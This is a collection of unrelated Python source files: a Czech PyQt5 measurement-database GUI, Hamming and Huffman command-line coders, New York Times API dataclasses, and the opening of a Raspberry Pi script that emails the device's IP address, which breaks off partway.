self.label.setText(self.filterToText(self._filter))
self.changeFilter = QPushButton(self)
self.changeFilter.setText("Upravit filtr")
self.changeFilter.clicked.connect(self.on_changeFilter_clicked)
self.removeFilter = QPushButton(self)
self.removeFilter.setText("Smazat filtr")
self.removeFilter.clicked.connect(self.on_removeFilter_clicked)
layout = QHBoxLayout()
layout.addWidget(QLabel("Aktivnรญ filtr: "))
layout.addWidget(self.label)
layout.setStretch(1, 1)
layout.addWidget(self.changeFilter)
layout.addWidget(self.removeFilter)
layout.setContentsMargins(0, 0, 0, 0)
self.setLayout(layout)
self.setMinimumHeight(60)
@pyqtSlot()
def on_changeFilter_clicked(self):
filterDialog = FilterDialog()
filterDialog.initControls(self.options, self._filter)
if filterDialog.exec_() == QDialog.Accepted:
self.setFilter(filterDialog.filter())
@pyqtSlot()
def on_removeFilter_clicked(self):
self.setFilter({})
def setFilter(self, filter_):
self._filter = filter_
self.onFilterChange()
def setOptions(self, options):
self.options = options
def onFilterChange(self):
self.label.setText(self.filterToText(self._filter))
self.filterChanged.emit(self._filter)
def filter(self):
return self._filter
def utc_to_local(utc_dt):
return utc_dt.replace(tzinfo=timezone.utc).astimezone(tz=None)
if __name__ == '__main__':
import sys
from PyQt5.QtWidgets import QApplication
from datetime import datetime
app = QApplication(sys.argv)
options = {'block': [1, 2, 3, 4, 5], \
'device': ['rm2-x', 'zc-3d', 'qap'], \
'unit': ['Hz', 'A', 'm^2']}
filter_ = {'block': 4, 'unit': 'Hz', 'deviated_values': True, \
'start_datetime': datetime(2015,5,7,10)}
widget = FilteringWidget()
widget.setOptions(options)
widget.setFilter(filter_)
widget.show()
sys.exit(app.exec_())
```
#### File: app/ui/logswidget.py
```python
from PyQt5.QtCore import Qt, pyqtSignal, pyqtSlot, QTimeZone, QDateTime
from PyQt5.QtWidgets import (QWidget, QHBoxLayout, QPushButton, QLabel,
QDialog, QVBoxLayout, QComboBox, QDateTimeEdit, QFormLayout, QHBoxLayout)
from datetime import datetime, timezone
import calendar
from .filteringwidget import FilteringWidget
from .paginatortablewidget import PaginatorTableWidget
class LogsWidget(QWidget):
requestData = pyqtSignal(dict, int, int)
def __init__(self, parent=None):
super(LogsWidget, self).__init__(parent)
self.offset = 0
self.limit = PaginatorTableWidget.PAGE_ROW_COUNT
self._filter = {}
self.filtering = LogFilteringWidget()
self.filtering.filterChanged.connect(self.on_filterChanged)
self.table = PaginatorTableWidget()
self.table.layout().setContentsMargins(0, 0, 0, 0)
self.table.setPageRowCount(self.limit)
self.table.requestData.connect(self.on_table_requestData)
self.table.setColumnHeaders(['Datum a ฤas', 'Operace',
'Tabulka', 'Popis'])
header = self.table.table.horizontalHeader()
header.resizeSection(0, 190)
header.resizeSection(1, 110)
header.resizeSection(2, 110)
header.resizeSection(3, 110)
layout = QVBoxLayout()
layout.addWidget(self.filtering)
layout.addWidget(self.table)
self.setLayout(layout)
@pyqtSlot(int, int)
def on_table_requestData(self, offset, limit):
self.offset = offset
self.limit = limit
self.requestData.emit(self._filter, self.offset, self.limit)
@pyqtSlot(dict)
def on_filterChanged(self, filter_):
self._filter = filter_
self.table.controls.counter.setValue(1)
self.requestData.emit(self._filter, self.offset, self.limit)
def setData(self, data):
self.table.setData(data)
def setMaxRowCount(self, rowCount):
self.table.setMaxRowCount(rowCount)
def setFilterOptions(self, options):
self.filtering.setOptions(options)
def setFilter(self, filter_):
self.filtering.setFilter(filter_)
def filter(self):
return self._filter
def updateData(self):
self.requestData.emit(self._filter, self.offset, self.limit)
class LogFilteringWidget(FilteringWidget):
@staticmethod
def filterToText(filter_):
def appendText(original, additional):
if not original:
return additional
return original + ', ' + additional
if not filter_:
return "(ลพรกdnรฝ)"
text = ""
if 'operation' in filter_:
text = appendText(text, 'Operace: %s' % filter_['operation'])
if 'tablename' in filter_:
text = appendText(text, 'Tabulka: %s' % filter_['tablename'])
if 'start_datetime' in filter_:
text = appendText(text, 'Od: %s' % \
utc_to_local(filter_['start_datetime']).
strftime('%Y-%m-%d %H:%M:%S'))
if 'end_datetime' in filter_:
text = appendText(text, 'Do: %s' % \
utc_to_local(filter_['end_datetime']).
strftime('%Y-%m-%d %H:%M:%S'))
return text
@pyqtSlot()
def on_changeFilter_clicked(self):
pass
filterDialog = LogFilterDialog()
filterDialog.initControls(self._filter)
if filterDialog.exec_() == QDialog.Accepted:
self.setFilter(filterDialog.filter())
TZ = QTimeZone('Europe/Prague')
class LogFilterDialog(QDialog):
OPERATION_OPTIONS = ['', 'insert', 'delete']
TABLENAME_OPTIONS = ['', 'blocks', 'devices', 'measurements',\
'raw_data_view']
def __init__(self, parent=None):
super(LogFilterDialog, self).__init__(parent)
self.accepted.connect(self.createFilter)
self.operationCombo = QComboBox()
self.operationCombo.addItems(LogFilterDialog.OPERATION_OPTIONS)
self.tablenameCombo = QComboBox()
self.tablenameCombo.addItems(LogFilterDialog.TABLENAME_OPTIONS)
self.fromEdit = QDateTimeEdit()
self.toEdit = QDateTimeEdit()
groupLayout = QFormLayout()
groupLayout.addRow("Od: ", self.fromEdit)
groupLayout.addRow("Do: ", self.toEdit)
groupLayout.addRow("Operace: ", self.operationCombo)
groupLayout.addRow("Tabulka: ", self.tablenameCombo)
rejectButton = QPushButton("Storno")
rejectButton.clicked.connect(self.reject)
acceptButton = QPushButton("OK")
acceptButton.clicked.connect(self.accept)
buttonsLayout = QHBoxLayout()
buttonsLayout.addStretch(1)
buttonsLayout.addWidget(acceptButton)
buttonsLayout.addWidget(rejectButton)
layout = QVBoxLayout()
layout.addLayout(groupLayout)
layout.addSpacing(12)
layout.addLayout(buttonsLayout)
self.setLayout(layout)
self.setMinimumWidth(300)
self.setWindowTitle("Filtrovรกnรญ logลฏ")
def initControls(self, filter_):
selected = filter_.get('operation', '')
try:
index = LogFilterDialog.OPERATION_OPTIONS.index(selected)
except ValueError:
index = 0
self.operationCombo.setCurrentIndex(index)
selected = filter_.get('tablename', '')
try:
index = LogFilterDialog.TABLENAME_OPTIONS.index(selected)
except ValueError:
index = 0
self.tablenameCombo.setCurrentIndex(index)
start = filter_.get('start_datetime', None)
if start is None:
start = datetime.utcnow()
start = calendar.timegm(start.timetuple()) - 3600*24
else:
start = calendar.timegm(start.timetuple())
end = filter_.get('end_datetime', datetime.utcnow())
end = calendar.timegm(end.timetuple())
self.fromEdit.setDateTime(QDateTime.fromTime_t(start, TZ))
self.toEdit.setDateTime(QDateTime.fromTime_t(end, TZ))
def getFilter(self):
filter_ = {}
start = self.fromEdit.dateTime().toTime_t()
end = self.toEdit.dateTime().toTime_t()
filter_['start_datetime'] = datetime.utcfromtimestamp(start)
filter_['end_datetime'] = datetime.utcfromtimestamp(end)
if self.operationCombo.currentText():
filter_['operation'] = self.operationCombo.currentText()
if self.tablenameCombo.currentText():
filter_['tablename'] = self.tablenameCombo.currentText()
return filter_
@pyqtSlot()
def createFilter(self):
self._filter = self.getFilter()
def filter(self):
return self._filter
def utc_to_local(utc_dt):
return utc_dt.replace(tzinfo=timezone.utc).astimezone(tz=None)
```
#### File: app/ui/mainwindow.py
```python
from PyQt5.QtWidgets import (QMainWindow, qApp, QMessageBox, QFileDialog,
QDialog)
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import pyqtSlot
from copy import deepcopy
from .. import database as db
from .importdialog import ImportDialog
from .deviceswidget import DevicesWidget
from .blockswidget import BlocksWidget
from .measurementswidget import MeasurementsWidget
from .exportdialog import ExportDialog
from .logswidget import LogsWidget
class MainWindow(QMainWindow):
def __init__(self):
super(MainWindow, self).__init__()
self.options = {}
self.setupUi(self)
self.updateData()
self.on_requestBlockData(self.blocksWidget.filter())
self.on_requestMeasurementData(self.measurementsWidget.filter(),
self.measurementsWidget.offset, self.measurementsWidget.limit)
self.on_requestLogData(self.logsWidget.filter(),
self.logsWidget.offset, self.logsWidget.limit)
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(800, 600)
# TABS
self.tabsWidget = QtWidgets.QTabWidget(MainWindow)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding,
QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.tabsWidget.sizePolicy().
hasHeightForWidth())
self.tabsWidget.setSizePolicy(sizePolicy)
self.tabsWidget.currentChanged.connect(self.on_tabChanged)
self.devicesWidget = DevicesWidget()
self.devicesWidget.removeDevice.connect(self.on_removeDevice)
self.blocksWidget = BlocksWidget()
self.blocksWidget.removeBlock.connect(self.on_removeBlock)
self.blocksWidget.requestData.connect(self.on_requestBlockData)
self.blocksWidget.requestDetail.connect(self.on_requestBlockDetail)
self.measurementsWidget = MeasurementsWidget()
self.measurementsWidget.requestData.connect(self.on_requestMeasurementData)
self.logsWidget = LogsWidget()
self.logsWidget.requestData.connect(self.on_requestLogData)
self.tabsWidget.addTab(self.blocksWidget, "Skupiny mฤลenรญ")
self.tabsWidget.addTab(self.measurementsWidget, "Namฤลenรฉ hodnoty")
self.tabsWidget.addTab(self.devicesWidget, "Pลรญstroje")
self.tabsWidget.addTab(self.logsWidget, "Log")
self.setCentralWidget(self.tabsWidget)
# MENU
menuBar = QtWidgets.QMenuBar(MainWindow)
menuBar.setGeometry(QtCore.QRect(0, 0, 800, 20))
action_Import = QtWidgets.QAction(MainWindow)
action_Import.setText('&Import')
action_Import.triggered.connect(self.on_action_Import_triggered)
action_Export = QtWidgets.QAction(MainWindow)
action_Export.setText('&Export')
action_Export.triggered.connect(self.on_action_Export_triggered)
menu_File = QtWidgets.QMenu(menuBar)
menu_File.setTitle('&Soubor')
menu_File.addAction(action_Import)
menu_File.addAction(action_Export)
menuBar.addAction(menu_File.menuAction())
MainWindow.setMenuBar(menuBar)
self.setWindowTitle("RDB 2015 - Kลรญzek, Madฤra, Gabriel")
def setDevices(self, devices):
if devices:
self.devicesWidget.setData(devices)
self.options['device'] = [device[0] for device in devices]
self.on_options_updated()
@pyqtSlot(str)
def on_removeDevice(self, serial_number):
title = "Odstranit pลรญstroj %s?" % serial_number
text = "Odstranฤnรญm pลรญstroje se smaลพou i vลกechny jรญm namฤลenรฉ " + \
"hodnoty.\n\nOpravdu chcete odstranit pลรญstroj %s?" % \
serial_number
buttons = QMessageBox.Yes | QMessageBox.No
msgBox = QMessageBox(QMessageBox.Question, title, text, buttons)
if msgBox.exec_() == QMessageBox.Yes:
db.execute(db.remove_device, self.updateData, serial_number)
def setBlocks(self, blocks):
if blocks:
self.options['block'] = [block[0] for block in blocks]
self.on_options_updated()
@pyqtSlot(int)
def on_removeBlock(self, block_id):
title = "Odstranit mฤลรญcรญ blok %s?" % block_id
text = "Odstranฤnรญm mฤลรญcรญho bloku se smaลพou i vลกechny namฤลenรฉ " + \
"hodnoty v rรกmci tohoto bloku.\n\nOpravdu chcete " + \
"odstranit mฤลรญcรญ blok %s?" % block_id
buttons = QMessageBox.Yes | QMessageBox.No
msgBox = QMessageBox(QMessageBox.Question, title, text, buttons)
if msgBox.exec_() == QMessageBox.Yes:
db.execute(db.remove_block, self.on_blockRemoved, block_id)
def on_blockRemoved(self, *args):
db.execute(db.get_blocks, self.setBlocks)
self.blocksWidget.updateData()
@pyqtSlot(dict)
def on_requestBlockData(self, filter_):
db.execute(db.get_blocks, self.blocksWidget.setData, filter_)
@pyqtSlot(int)
def on_requestBlockDetail(self, block_id):
filter_ = deepcopy(self.blocksWidget.filter())
filter_['block'] = block_id
self.measurementsWidget.setFilter(filter_)
self.tabsWidget.setCurrentIndex(1)
def on_action_Import_triggered(self):
caption = 'Import csv dat'
dialog = QFileDialog(self, caption)
dialog.setFileMode(QFileDialog.ExistingFile)
dialog.setNameFilters(['CSV soubory (*.csv)', 'Vลกechny soubory (*)'])
if dialog.exec_():
importDialog = ImportDialog()
importDialog.setFilename(dialog.selectedFiles()[0])
importDialog.exec_()
self.updateData()
self.blocksWidget.updateData()
self.measurementsWidget.updateData()
def on_action_Export_triggered(self):
exportDialog = ExportDialog()
exportDialog.setFilterOptions(self.options)
filter_ = self.measurementsWidget.filter()
if self.tabsWidget.currentIndex() == 0:
filter_ =self.blocksWidget.filter()
exportDialog.setFilter(filter_)
exportDialog.exec_()
def updateData(self, *args):
db.execute(db.get_blocks, self.setBlocks)
db.execute(db.get_devices, self.setDevices)
db.execute(db.get_units, self.setUnits)
def setUnits(self, units):
if units:
self.options['unit'] = [unit[0] for unit in units]
self.on_options_updated()
def on_options_updated(self):
self.blocksWidget.setFilterOptions(self.options)
self.measurementsWidget.setFilterOptions(self.options)
@pyqtSlot(dict, int, int)
def on_requestMeasurementData(self, filter_, offset, limit):
# db.execute(db.get_measurements_count,
# self.measurementsWidget.setMaxRowCount,
# filter_)
db.execute(db.get_measurements,
self.measurementsWidget.setData,
filter_, offset, limit)
@pyqtSlot(dict, int, int)
def on_requestLogData(self, filter_, offset, limit):
db.execute(db.get_logs, self.logsWidget.setData,
filter_, offset, limit)
@pyqtSlot(int)
def on_tabChanged(self, index):
if index == 3:
self.logsWidget.updateData()
```
#### File: app/ui/measurementswidget.py
```python
from PyQt5.QtCore import Qt, pyqtSignal, pyqtSlot
from PyQt5.QtWidgets import QVBoxLayout, QWidget
from .filteringwidget import FilteringWidget
from .paginatortablewidget import PaginatorTableWidget
class MeasurementsWidget(QWidget):
requestData = pyqtSignal(dict, int, int)
def __init__(self, parent=None):
super(MeasurementsWidget, self).__init__(parent)
self.offset = 0
self.limit = PaginatorTableWidget.PAGE_ROW_COUNT
self._filter = {}
self.filtering = FilteringWidget()
self.filtering.filterChanged.connect(self.on_filterChanged)
self.table = PaginatorTableWidget()
self.table.layout().setContentsMargins(0, 0, 0, 0)
self.table.setPageRowCount(self.limit)
self.table.requestData.connect(self.on_table_requestData)
self.table.setColumnHeaders(['Datum a ฤas', 'Hodnota 1', 'Hodnota 2',
'Rozdรญl hodnot', 'Pลรญstroj', 'Odchylka'])
header = self.table.table.horizontalHeader()
header.resizeSection(0, 190)
header.resizeSection(1, 110)
header.resizeSection(2, 110)
header.resizeSection(3, 110)
header.resizeSection(4, 160)
layout = QVBoxLayout()
layout.addWidget(self.filtering)
layout.addWidget(self.table)
self.setLayout(layout)
@pyqtSlot(int, int)
def on_table_requestData(self, offset, limit):
self.offset = offset
self.limit = limit
self.requestData.emit(self._filter, self.offset, self.limit)
@pyqtSlot(dict)
def on_filterChanged(self, filter_):
self._filter = filter_
self.table.controls.counter.setValue(1)
self.requestData.emit(self._filter, self.offset, self.limit)
def setData(self, data):
self.table.setData(data)
def setMaxRowCount(self, rowCount):
self.table.setMaxRowCount(rowCount)
def setFilterOptions(self, options):
self.filtering.setOptions(options)
def setFilter(self, filter_):
self.filtering.setFilter(filter_)
def filter(self):
return self._filter
def updateData(self):
self.requestData.emit(self._filter, self.offset, self.limit)
if __name__ == '__main__':
import sys
from PyQt5.QtWidgets import QApplication
from datetime import datetime
app = QApplication(sys.argv)
options = {'block': [1, 2, 3, 4, 5], \
'device': ['rm2-x', 'zc-3d', 'qap'], \
'unit': ['Hz', 'A', 'm^2']}
filter_ = {'block': 4, 'unit': 'Hz', 'deviated_values': True, \
'start_datetime': datetime(2015,5,7,10)}
widget = MeasurementsWidget()
widget.setFilterOptions(options)
widget.setFilter(filter_)
widget.setMaxRowCount(100)
@pyqtSlot(dict, int, int)
def handle_requestData(filter_, offset, limit):
print(filter_, offset, limit)
widget.requestData.connect(handle_requestData)
widget.setData([[1, 2, 3,4,5, 6], [3, 5, 6, 7, 8, 9]])
widget.show()
sys.exit(app.exec_())
```
#### File: app/ui/paginationcontrols.py
```python
from PyQt5.QtCore import pyqtSlot, pyqtSignal
from PyQt5.QtWidgets import (QWidget, QHBoxLayout, QPushButton, QSpinBox)
class PaginationControls(QWidget):
PAGE_ROW_COUNT = 10
valueChanged = pyqtSignal(int)
def __init__(self, parent=None):
super(PaginationControls, self).__init__(parent)
self.counter = QSpinBox(self)
self.startButton = QPushButton(self)
self.prevButton = QPushButton(self)
self.nextButton = QPushButton(self)
self.endButton = QPushButton(self)
self.createGUI()
self.updateControls()
def createGUI(self):
self.startButton.setText("<<")
self.startButton.clicked.connect(self.on_startButton_clicked)
self.prevButton.setText("<")
self.prevButton.clicked.connect(self.on_prevButton_clicked)
self.nextButton.setText(">")
self.nextButton.clicked.connect(self.on_nextButton_clicked)
self.endButton.setText(">>")
self.endButton.clicked.connect(self.on_endButton_clicked)
self.counter.setMinimum(1)
self.counter.valueChanged.connect(self.on_counter_valueChanged)
layout = QHBoxLayout(self)
layout.addWidget(self.startButton)
layout.addWidget(self.prevButton)
layout.addWidget(self.counter)
layout.addWidget(self.nextButton)
layout.addWidget(self.endButton)
self.setLayout(layout)
def updateControls(self):
page = self.counter.value()
self.startButton.setEnabled(True)
self.prevButton.setEnabled(True)
self.nextButton.setEnabled(True)
self.endButton.setEnabled(True)
# end conditions for button enables/disables
if page == 1:
self.startButton.setEnabled(False)
self.prevButton.setEnabled(False)
if page == self.counter.maximum():
self.endButton.setEnabled(False)
self.nextButton.setEnabled(False)
def setMaximum(self, maximum):
self.counter.setMaximum(maximum)
self.updateControls()
@pyqtSlot()
def on_startButton_clicked(self):
self.counter.setValue(1)
@pyqtSlot()
def on_prevButton_clicked(self):
self.counter.setValue(self.counter.value() - 1)
@pyqtSlot()
def on_nextButton_clicked(self):
self.counter.setValue(self.counter.value() + 1)
@pyqtSlot()
def on_endButton_clicked(self):
self.counter.setValue(self.counter.maximum())
@pyqtSlot(int)
def on_counter_valueChanged(self, value):
self.updateControls()
self.valueChanged.emit(value)
if __name__ == '__main__':
import sys
from PyQt5.QtWidgets import QApplication
app = QApplication(sys.argv)
widget = PaginationControls()
widget.show()
sys.exit(app.exec_())
``` |
{
"source": "johnymachine/kas",
"score": 3
} |
#### File: kas/hamming-python/hamming_main.py
```python
import argparse
import time
import os
import hammcoder
import binpacker
import errormaker
def setup_parser():
'''
Basic parser setup for simple hamming command line input.
'''
parser = argparse.ArgumentParser(description='Command line hamming coder')
parser.add_argument("-i", "--input", required=True,
help="Insert path to input file.")
parser.add_argument("-o", "--output", required=True,
help="Insert path to output file.")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-K", "--encode", action="store_true",
help="Swiches to encoding")
group.add_argument("-D", "--decode", action="store_true",
help="Swiches to decoding")
group.add_argument("-1", "--singleerror", action="store_true",
help="Injects input file with single bit errors")
group.add_argument("-2", "--doubleerror", action="store_true",
help="Injects input file with double bit errors")
group.add_argument("-3", "--tripleerror", action="store_true",
help="Injects input file with triple bit errors")
group.add_argument("-R", "--randomerror", action="store_true",
help="Injects input file with random bit errors")
return parser
def main():
'''
Main program handler
'''
parser = setup_parser()
args = parser.parse_args()
inputfile = args.input
outputfile = args.output
#inputfile = "input.txt"
#outputfile = "output.hamm"
#inputfile = "output.hamm"
#outputfile = "input.rebulild.txt"
##inputfile = "output.hamm"
##outputfile = "output.singleerrors.hamm"
#inputfile = "output.singleerrors.hamm"
#outputfile = "input.rebulild.txt"
print "Welcome to Hamming code command line tool."
print "<NAME> (jan.gabriel(at)tul.cz"
print "========================================================"
print "from: " + inputfile + " =====>>>>> to: " + outputfile
if(args.encode):
print "You have selected to ENCODE"
print "========================================================"
start_time = time.time()
with open(inputfile, "rb") as ifile:
buff = binpacker.readBinaryToEncode(ifile)
output = hammcoder.hammingEncode(buff)
with open(outputfile, "wb") as ofile:
binpacker.writeBinaryToEncode(ofile, output)
end_time = time.time()
oldsize = os.path.getsize(inputfile)
newsize = os.path.getsize(outputfile)
compratio = (newsize / float(oldsize)) * 100
insec = end_time - start_time
print "You have succesfully ENCODED the file!"
print "%.3fkB => %.3fkB = %.2f" % (oldsize / 1000.0,
newsize / 1000.0, compratio) + "% increase in file size."
print "===================In: %.5s seconds!===================" % insec
elif(args.decode):
print "You have selected to DECODE"
print "========================================================"
start_time = time.time()
with open(inputfile, "rb") as ifile:
buff = binpacker.readBinaryToDecode(ifile)
output = hammcoder.hammingDecode(buff)
with open(outputfile, "wb") as ofile:
binpacker.writeBinaryToDecode(ofile, output["output"])
end_time = time.time()
oldsize = os.path.getsize(inputfile)
newsize = os.path.getsize(outputfile)
compratio = (newsize / float(oldsize)) * 100
insec = end_time - start_time
if len(output["log"]) == 0:
print "You have succesfully DECODED the file!"
else:
for log in output["log"]:
print log
print "%.3fkB => %.3fkB = %.2f" % (oldsize / 1000.0,
newsize / 1000.0, compratio) + "% decrease in file size."
print "===================In: %.5s seconds!===================" % insec
elif(args.singleerror or args.doubleerror
or args.tripleerror or args.randomerror):
start_time = time.time()
with open(inputfile, "rb") as ifile:
buff = binpacker.readBinaryToDecode(ifile)
if(args.singleerror):
print "You have selected to INJECT SINGLE ERRORS"
print "========================================================"
buff = errormaker.makeSingleError(buff)
elif(args.doubleerror):
print "You have selected to INJECT DOUBLE ERRORS"
print "========================================================"
buff = errormaker.makeDoubleError(buff)
elif(args.tripleerror):
print "You have selected to INJECT TRIPLE ERRORS"
print "========================================================"
buff = errormaker.makeTripleError(buff)
elif(args.randomerror):
print "You have selected to INJECT RANDOM ERRORS"
print "========================================================"
buff = errormaker.makeRandomError(buff)
with open(outputfile, "wb") as ofile:
binpacker.writeBinaryToEncode(ofile, buff)
end_time = time.time()
insec = end_time - start_time
print "You have succesfully INJECTED ERRORS!"
print "===================In: %.5s seconds!===================" % insec
else:
print "Sorry, something went terribly wrong!"
os.system("pause")
return 0
if __name__ == "__main__":
main()
```
#### File: kas/huffman-python/huffman_main.py
```python
import argparse
import time
import os
import huffcoder
import binpacker
def setup_parser():
'''
Basic parser setup for simple huffman command line input.
'''
parser = argparse.ArgumentParser(description='Command line huffman coder')
parser.add_argument("-i", "--input", required=True,
help="Insert path to input file.")
parser.add_argument("-o", "--output", required=True,
help="Insert path to output file.")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-K", "--encode", action="store_true",
help="Swiches to encoding")
group.add_argument("-D", "--decode", action="store_true",
help="Swiches to decoding")
return parser
def main():
'''
Main program handler
'''
parser = setup_parser()
args = parser.parse_args()
inputfile = args.input
outputfile = args.output
#inputfile = "output.huff"
#outputfile = "input.rebuild.txt"
#selection = "D"
print "Welcome to Huffman code command line tool."
print "<NAME> FMTUL (jan.gabriel(at)tul.cz"
print "========================================================"
print "from: " + inputfile + " =====>>>>> to: " + outputfile
if(args.encode):
print "You have selected to ENCODE"
print "========================================================"
start_time = time.time()
with open(inputfile, "rb") as ifile:
txt = binpacker.readBinaryToEncode(ifile)
encoded = huffcoder.huffmanEncode(txt)
packed = binpacker.packData(encoded["output"], encoded["occurrence"])
with open(outputfile, "wb") as ofile:
ofile.write(packed)
end_time = time.time()
oldsize = os.path.getsize(inputfile)
newsize = os.path.getsize(outputfile)
compratio = (newsize / float(oldsize)) * 100
insec = end_time - start_time
print "You have succesfully ENCODED the file!"
print "%.3fkB => %.3fkB = %.2f" % (oldsize / 1000.0,
newsize / 1000.0, compratio) + "% compression."
print "===================In: %.5s seconds!===================" % insec
elif(args.decode):
print "You have selected to DECODE"
print "========================================================"
start_time = time.time()
with open(inputfile, "rb") as ifile:
txt = binpacker.readBinaryToDecode(ifile)
unpacked = binpacker.unpackData(txt)
decoded = huffcoder.huffmanDecode(unpacked["output"],
unpacked["occurrence"])
with open(outputfile, "wb") as ofile:
ofile.write(decoded["output"])
end_time = time.time()
oldsize = os.path.getsize(inputfile)
newsize = os.path.getsize(outputfile)
compratio = (newsize / float(oldsize)) * 100
insec = end_time - start_time
print "You have succesfully DECODED the file!"
print "%.3fkB => %.3fkB = %.2f" % (oldsize / 1000.0,
newsize / 1000.0, compratio) + "% compression."
print "===================In: %.5s seconds!===================" % insec
else:
print "Sorry, something went terribly wrong!"
os.system("pause")
return 0
if __name__ == "__main__":
main()
``` |
{
"source": "johnymarin/finance-news",
"score": 3
} |
#### File: flaskProject/src/nytimes_api.py
```python
from enum import Enum
from dataclasses import dataclass
from typing import Any, List, TypeVar, Type, Callable, cast
from datetime import datetime
import dateutil.parser
T = TypeVar("T")
EnumT = TypeVar("EnumT", bound=Enum)
def from_str(x: Any) -> str:
assert isinstance(x, str)
return x
def from_int(x: Any) -> int:
assert isinstance(x, int) and not isinstance(x, bool)
return x
def to_enum(c: Type[EnumT], x: Any) -> EnumT:
assert isinstance(x, c)
return x.value
def from_datetime(x: Any) -> datetime:
return dateutil.parser.parse(x)
def from_list(f: Callable[[Any], T], x: Any) -> List[T]:
assert isinstance(x, list)
return [f(y) for y in x]
def to_class(c: Type[T], x: Any) -> dict:
assert isinstance(x, c)
return cast(Any, x).to_dict()
class ItemType(Enum):
ARTICLE = "Article"
class Format(Enum):
MEDIUM_THREE_BY_TWO210 = "mediumThreeByTwo210"
NORMAL = "Normal"
STANDARD_THUMBNAIL = "Standard Thumbnail"
SUPER_JUMBO = "superJumbo"
THUMB_LARGE = "thumbLarge"
class Subtype(Enum):
PHOTO = "photo"
class TypeEnum(Enum):
IMAGE = "image"
@dataclass
class Multimedia:
url: str
format: Format
height: int
width: int
type: TypeEnum
subtype: Subtype
caption: str
copyright: str
@staticmethod
def from_dict(obj: Any) -> 'Multimedia':
assert isinstance(obj, dict)
url = from_str(obj.get("url"))
format = Format(obj.get("format"))
height = from_int(obj.get("height"))
width = from_int(obj.get("width"))
type = TypeEnum(obj.get("type"))
subtype = Subtype(obj.get("subtype"))
caption = from_str(obj.get("caption"))
copyright = from_str(obj.get("copyright"))
return Multimedia(url, format, height, width, type, subtype, caption, copyright)
def to_dict(self) -> dict:
result: dict = {}
result["url"] = from_str(self.url)
result["format"] = to_enum(Format, self.format)
result["height"] = from_int(self.height)
result["width"] = from_int(self.width)
result["type"] = to_enum(TypeEnum, self.type)
result["subtype"] = to_enum(Subtype, self.subtype)
result["caption"] = from_str(self.caption)
result["copyright"] = from_str(self.copyright)
return result
@dataclass
class Result:
section: str
subsection: str
title: str
abstract: str
url: str
uri: str
byline: str
item_type: ItemType
updated_date: datetime
created_date: datetime
published_date: datetime
material_type_facet: str
kicker: str
des_facet: List[str]
org_facet: List[str]
per_facet: List[str]
geo_facet: List[str]
multimedia: List[Multimedia]
short_url: str
@staticmethod
def from_dict(obj: Any) -> 'Result':
assert isinstance(obj, dict)
section = from_str(obj.get("section"))
subsection = from_str(obj.get("subsection"))
title = from_str(obj.get("title"))
abstract = from_str(obj.get("abstract"))
url = from_str(obj.get("url"))
uri = from_str(obj.get("uri"))
byline = from_str(obj.get("byline"))
item_type = ItemType(obj.get("item_type"))
updated_date = from_datetime(obj.get("updated_date"))
created_date = from_datetime(obj.get("created_date"))
published_date = from_datetime(obj.get("published_date"))
material_type_facet = from_str(obj.get("material_type_facet"))
kicker = from_str(obj.get("kicker"))
des_facet = from_list(from_str, obj.get("des_facet"))
org_facet = from_list(from_str, obj.get("org_facet"))
per_facet = from_list(from_str, obj.get("per_facet"))
geo_facet = from_list(from_str, obj.get("geo_facet"))
multimedia = from_list(Multimedia.from_dict, obj.get("multimedia"))
short_url = from_str(obj.get("short_url"))
return Result(section, subsection, title, abstract, url, uri, byline, item_type, updated_date, created_date, published_date, material_type_facet, kicker, des_facet, org_facet, per_facet, geo_facet, multimedia, short_url)
def to_dict(self) -> dict:
result: dict = {}
result["section"] = from_str(self.section)
result["subsection"] = from_str(self.subsection)
result["title"] = from_str(self.title)
result["abstract"] = from_str(self.abstract)
result["url"] = from_str(self.url)
result["uri"] = from_str(self.uri)
result["byline"] = from_str(self.byline)
result["item_type"] = to_enum(ItemType, self.item_type)
result["updated_date"] = self.updated_date.isoformat()
result["created_date"] = self.created_date.isoformat()
result["published_date"] = self.published_date.isoformat()
result["material_type_facet"] = from_str(self.material_type_facet)
result["kicker"] = from_str(self.kicker)
result["des_facet"] = from_list(from_str, self.des_facet)
result["org_facet"] = from_list(from_str, self.org_facet)
result["per_facet"] = from_list(from_str, self.per_facet)
result["geo_facet"] = from_list(from_str, self.geo_facet)
result["multimedia"] = from_list(lambda x: to_class(Multimedia, x), self.multimedia)
result["short_url"] = from_str(self.short_url)
return result
@dataclass
class ArticleModel:
status: str
copyright: str
section: str
last_updated: datetime
num_results: int
results: List[Result]
@staticmethod
def from_dict(obj: Any) -> 'ArticleModel':
assert isinstance(obj, dict)
status = from_str(obj.get("status"))
copyright = from_str(obj.get("copyright"))
section = from_str(obj.get("section"))
last_updated = from_datetime(obj.get("last_updated"))
num_results = from_int(obj.get("num_results"))
results = from_list(Result.from_dict, obj.get("results"))
return ArticleModel(status, copyright, section, last_updated, num_results, results)
def to_dict(self) -> dict:
result: dict = {}
result["status"] = from_str(self.status)
result["copyright"] = from_str(self.copyright)
result["section"] = from_str(self.section)
result["last_updated"] = self.last_updated.isoformat()
result["num_results"] = from_int(self.num_results)
result["results"] = from_list(lambda x: to_class(Result, x), self.results)
return result
def article_model_from_dict(s: Any) -> ArticleModel:
return ArticleModel.from_dict(s)
def article_model_to_dict(x: ArticleModel) -> Any:
return to_class(ArticleModel, x)
``` |
{
"source": "johnymoo/RaspberryPi",
"score": 3
} |
#### File: RaspberryPi/script/mailIP.py
```python
import subprocess
import smtplib
import socket
import time
from email.mime.text import MIMEText
import datetime
# the receiver email
receiver='[your_<EMAIL>'
def sm(receiver, title, body):
host = 'smtp.163.com'
port = 25
sender = '[your_email]<EMAIL>'
pwd = '[<PASSWORD>]'
msg = MIMEText(body, 'html')
msg['subject'] = title
msg['from'] = sender
msg['to'] = receiver
s = smtplib.SMTP(host, port)
s.login(sender, pwd)
s.sendmail(sender, receiver, msg.as_string())
print 'The mail named %s to %s is sended successly.' % (title, receiver)
# Change to your own account information
today = datetime.date.today()
# Very Linux Specific
arg='ip route list'
p=subprocess.Popen(arg,shell=True,stdout=subprocess.PIPE)
